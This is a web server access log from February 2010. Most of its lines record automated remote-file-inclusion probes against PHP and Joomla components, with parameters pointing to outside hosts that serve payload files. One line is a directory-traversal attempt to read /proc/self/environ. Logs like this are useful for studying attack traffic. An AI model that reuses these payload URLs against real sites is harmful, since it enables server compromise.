114.108.128.160 - - [15/Feb/2010:02:25:37 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:25:37 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:25:37 -0500] "GET /logs/access_log.Q110020700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:25:43 -0500] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
122.200.203.11 - - [15/Feb/2010:02:25:46 -0500] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
122.200.203.11 - - [15/Feb/2010:02:25:46 -0500] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
122.200.203.11 - - [15/Feb/2010:02:25:46 -0500] "GET /logs/access_log.Q109111100%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:25:46 -0500] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
122.200.203.11 - - [15/Feb/2010:02:25:48 -0500] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
122.200.203.11 - - [15/Feb/2010:02:25:48 -0500] "GET /logs/access_log.Q109111100%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.200.203.11 - - [15/Feb/2010:02:25:48 -0500] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
95.108.128.242 - - [15/Feb/2010:02:25:51 -0500] "GET /images/_notes/banner_connect_off_r2_c1.gif.mno HTTP/1.1" 200 255 "-" "Yandex/1.01.001 (compatible; Win16; I)"
208.87.240.120 - - [15/Feb/2010:02:26:08 -0500] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:02:26:08 -0500] "GET /logs/access_log.Q109051900/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:02:26:08 -0500] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
122.200.203.11 - - [15/Feb/2010:02:26:23 -0500] "GET /logs/error_log.Q109111100%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.200.203.11 - - [15/Feb/2010:02:26:25 -0500] "GET /logs/error_log.Q109111100%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:02:26:42 -0500] "GET /logs/access_log.Q109051900/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:02:26:42 -0500] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:02:26:42 -0500] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:02:26:46 -0500] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:02:26:46 -0500] "GET /logs/access_log.Q109051900/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:02:26:46 -0500] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:26:52 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:26:52 -0500] "GET /logs/access_log.Q109101600%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:26:52 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:27:24 -0500] "GET /logs/access_log.Q110011600%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:27:37 -0500] "GET /logs/access_log.Q110011600%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:28:38 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:28:38 -0500] "GET /logs/access_log.Q109071000//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:28:38 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:28:38 -0500] "GET /logs/access_log.Q109121000//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.201.82.173 - - [15/Feb/2010:02:28:39 -0500] "GET /index.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
174.36.1.51 - - [15/Feb/2010:02:29:41 -0500] "GET /logs/access_log.Q110020800//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:29:41 -0500] "GET /logs/access_log.Q109071400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:02:29:51 -0500] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:02:29:56 -0500] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:02:29:56 -0500] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:02:30:03 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.110.50.120 - - [15/Feb/2010:02:30:11 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:02:30:11 -0500] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:02:30:11 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:02:30:12 -0500] "GET /logs/access_log.Q109071200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
64.15.158.246 - - [15/Feb/2010:02:30:14 -0500] "GET /phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:30:16 -0500] "GET //main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:30:16 -0500] "GET /logs//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:30:16 -0500] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:30:18 -0500] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:30:22 -0500] "GET /phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:30:22 -0500] "GET /logs/phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:30:22 -0500] "GET /logs/access_log.Q110011700%20%20/phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:30:23 -0500] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:30:23 -0500] "GET /logs/access_log.Q109122700%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:30:24 -0500] "GET /logs/phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:30:24 -0500] "GET /logs/access_log.Q110011700%20%20/phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:30:26 -0500] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:30:31 -0500] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:30:36 -0500] "GET /logs/access_log.Q109101400%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:32:00 -0500] "GET /logs/access_log.Q109102900/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:32:23 -0500] "GET /logs/error_log.Q109051300%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:33:31 -0500] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:33:31 -0500] "GET /logs/access_log.Q109070700%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:33:31 -0500] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:33:31 -0500] "GET /logs/access_log.Q109081500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:33:39 -0500] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:33:39 -0500] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:33:39 -0500] "GET /logs/access_log.Q109070700%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:33:39 -0500] "GET /logs/access_log.Q109081500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:33:46 -0500] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:33:46 -0500] "GET /logs/access_log.Q109111100%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:33:46 -0500] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:34:39 -0500] "GET /logs/error_log.Q109111100%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
194.249.18.67 - - [15/Feb/2010:02:34:44 -0500] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
194.249.18.67 - - [15/Feb/2010:02:34:44 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
200.93.147.154 - - [15/Feb/2010:02:35:55 -0500] "GET /logs/access_log.Q109102900//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:36:14 -0500] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:36:14 -0500] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:36:14 -0500] "GET /logs/access_log.Q109111100//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
88.84.137.160 - - [15/Feb/2010:02:36:34 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 243 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
88.84.137.160 - - [15/Feb/2010:02:36:34 -0500] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 248 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
95.108.128.242 - - [15/Feb/2010:02:36:42 -0500] "GET /logs/error_log.Q108061400 HTTP/1.1" 404 223 "-" "Yandex/1.01.001 (compatible; Win16; I)"
80.172.236.41 - - [15/Feb/2010:02:36:57 -0500] "GET /logs/error_log.Q109111100//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.249.68.151 - - [15/Feb/2010:02:37:20 -0500] "GET /images/nav04_shop_over.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
216.36.59.85 - - [15/Feb/2010:02:37:54 -0500] "GET /logs/ihm.php?p=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
216.36.59.85 - - [15/Feb/2010:02:37:54 -0500] "GET /logs/access_log.Q110010900%20%20/ihm.php?p=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.36.59.85 - - [15/Feb/2010:02:37:54 -0500] "GET /ihm.php?p=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:02:38:03 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.36.59.85 - - [15/Feb/2010:02:38:05 -0500] "GET /ihm.php?p=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
216.36.59.85 - - [15/Feb/2010:02:38:05 -0500] "GET /logs/access_log.Q110010900/ihm.php?p=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.36.59.85 - - [15/Feb/2010:02:38:05 -0500] "GET /logs/ihm.php?p=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:38:28 -0500] "GET /logs/access_log.Q109100700//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.36.59.85 - - [15/Feb/2010:02:38:34 -0500] "GET /logs/access_log.Q110010900/ihm.php?p=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.36.59.85 - - [15/Feb/2010:02:38:34 -0500] "GET /logs/ihm.php?p=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
216.36.59.85 - - [15/Feb/2010:02:38:34 -0500] "GET /ihm.php?p=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
216.36.59.85 - - [15/Feb/2010:02:38:34 -0500] "GET /logs/error_log.Q110010900/ihm.php?p=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:38:36 -0500] "GET /logs/access_log.Q109101400//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:38:53 -0500] "GET //bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:38:53 -0500] "GET /logs//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:38:53 -0500] "GET /logs/access_log.Q110012000%20%20//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:39:12 -0500] "GET /logs//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:39:12 -0500] "GET //bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:39:12 -0500] "GET /logs/access_log.Q110012000%20%20//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:40:09 -0500] "GET //include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:40:09 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:40:09 -0500] "GET /logs/access_log.Q109073100//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:40:13 -0500] "GET /logs/access_log.Q109081500//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.36.59.85 - - [15/Feb/2010:02:40:23 -0500] "GET /logs/error_log.Q110010900/ihm.php?p=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
216.36.59.85 - - [15/Feb/2010:02:40:28 -0500] "GET /logs/error_log.Q110010900%20%20/ihm.php?p=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:41:04 -0500] "GET //include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:41:04 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:41:04 -0500] "GET /logs/access_log.Q109073100//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:41:04 -0500] "GET /logs/access_log.Q109081500//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.111.3.35 - - [15/Feb/2010:02:41:14 -0500] "GET /logs//list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
61.111.3.35 - - [15/Feb/2010:02:41:14 -0500] "GET /logs/error_log.Q109100800//list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
61.111.3.35 - - [15/Feb/2010:02:41:14 -0500] "GET //list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
74.54.22.2 - - [15/Feb/2010:02:41:30 -0500] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 248 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
74.54.22.2 - - [15/Feb/2010:02:41:30 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 243 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
194.249.18.67 - - [15/Feb/2010:02:41:33 -0500] "GET /logs//pollphp/db//booth.php?include_path=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
194.249.18.67 - - [15/Feb/2010:02:41:33 -0500] "GET //pollphp/db//booth.php?include_path=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.36.1.51 - - [15/Feb/2010:02:41:49 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:41:49 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:41:49 -0500] "GET /logs/access_log.Q110020300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:41:54 -0500] "GET /logs/error_log.Q110020300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:42:07 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:42:07 -0500] "GET /logs/access_log.Q110020300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:42:07 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:42:12 -0500] "GET /logs/error_log.Q110020300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
